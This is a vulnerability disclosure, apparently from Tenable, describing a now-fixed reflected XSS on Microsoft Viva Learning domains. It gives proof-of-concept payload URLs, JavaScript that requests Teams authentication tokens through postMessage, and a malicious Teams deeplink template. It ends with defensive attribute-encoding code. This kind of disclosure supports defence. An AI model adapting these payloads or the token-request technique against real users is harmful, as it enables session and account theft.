A reflected cross-site scripting (XSS) vulnerability affected the parameters of /auth/start.html at the following domains:
- learningclient-canary.teams.microsoft.com
- web.vivalearn.microsoft.com
- client.learningapp.microsoft.com
An XSS on these domains could lead to a number of impacts, the most serious of which could be achieved via client.learningapp.microsoft.com.
As that domain is a trusted domain for the Viva Learning app in Microsoft Teams, an attacker could create a malicious link which could lead to the theft of a user's authentication tokens for a number of Microsoft services (including Teams).
Proof of Concept:
Note: as the issue has been fixed, these XSS payloads will no longer trigger.
The simplest proof of concept would be triggering a simple alert box:
https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https://www.linkedin.com/&prompt=%22%2F%3E%3C%2Fform%3E%3Cform%20name%3D%22loginForm%22%2F%3E%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E
However, we could also craft a more complicated payload by instead running eval(atob("some_payload_in_base64")). For example, we could create one which executes the following:
    // Desktop client: the host exposes a native message proxy and framelessPostMessage.
    if (typeof initOnNativeMessageProxy == 'function') {
        initOnNativeMessageProxy(function (event) {
            alert(JSON.stringify(event))
        });
        nativeInterface.framelessPostMessage('{ "id": "Tenable",
            "func": "authentication.getAuthToken",
            "args": [[ "https://teams.microsoft.com" ]]}');
    } else {
        // Browser client: talk to the parent Teams frame with window.postMessage().
        function receiveMessage(event) {
            if (event.data.id == "Tenable" && event.data.origin != null) {
                alert(JSON.stringify(event.data))
            }
        }
        window.addEventListener("message", receiveMessage, false);
        top.postMessage({
            "id": "Tenable",
            "func": "authentication.getAuthToken",
            "args": [
                ["https://teams.microsoft.com"]
            ]
        }, "*");
    }
This JavaScript, when run in the context of an iframe opened in Microsoft Teams, uses postMessage() to request an authentication token for teams.microsoft.com, and then pops an alert box containing the postMessage() response (though an attacker could just as easily send the token to a listener).
This works in either the desktop client or the browser version of Teams (the desktop client uses framelessPostMessage).
Combining this with the fact that client.learningapp.microsoft.com is a trusted domain for Viva Learning allows an attacker to craft a Microsoft Teams deeplink as follows:
https://teams.microsoft.com/_#/l/task/2e3a628d-6f54-4100-9e7a-f00bc3621a85?url=https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https://www.linkedin.com/&prompt="/></form><form name="loginForm"/><img src=x onerror=eval(atob("BASE64_Payload")) />
Where 2e3a628d-6f54-4100-9e7a-f00bc3621a85 corresponds to the Viva Learning App.
This link, when clicked within a Microsoft Teams chat, would allow an attacker to steal the victim's auth tokens.
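The root cause is a query parameter reflected into an HTML attribute without encoding, so a value containing `"/>` closes the attribute and the form and any markup that follows is parsed as new elements. The example below is added here and is not code from the advisory or from Microsoft; the form template, the function names and the tag-counting check are assumptions used to show how attribute-context encoding neutralises the `prompt` value from the proof-of-concept URL above.

```javascript
// Added example (not from the advisory): attribute-context encoding for a
// reflected query parameter such as `prompt` on /auth/start.html.
// The form template is a hypothetical stand-in for the real page.

// Encode the characters that can terminate an attribute or open a tag.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Weak rendering: the raw parameter is concatenated into a quoted attribute,
// which is the pattern the reflected XSS relies on.
function renderUnsafe(prompt) {
  return '<form name="loginForm"><input type="hidden" name="prompt" value="'
    + prompt + '"></form>';
}

// Hardened rendering: the same template, but the value is encoded for the
// attribute context before insertion, so it can never leave the attribute.
function renderSafe(prompt) {
  return '<form name="loginForm"><input type="hidden" name="prompt" value="'
    + encodeForHtmlAttribute(prompt) + '"></form>';
}

// Count opening tags the browser would see. The template contains exactly
// two (<form>, <input>); a reflected value must never add more.
function countOpeningTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Extract `prompt` from a URL the way a browser would (percent-decoded).
function promptParamFromUrl(url) {
  return new URL(url).searchParams.get('prompt');
}

// The simple proof-of-concept URL quoted in the advisory.
const POC_URL = 'https://client.learningapp.microsoft.com/auth/start.html'
  + '?provider=LiLHub&loginWebUrl=https://www.linkedin.com/'
  + '&prompt=%22%2F%3E%3C%2Fform%3E%3Cform%20name%3D%22loginForm%22%2F%3E'
  + '%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E';

// Stand-alone run: the weak version yields 4 opening tags, the safe one 2.
const prompt = promptParamFromUrl(POC_URL);
console.log('unsafe tags:', countOpeningTags(renderUnsafe(prompt)));
console.log('safe tags:  ', countOpeningTags(renderSafe(prompt)));
```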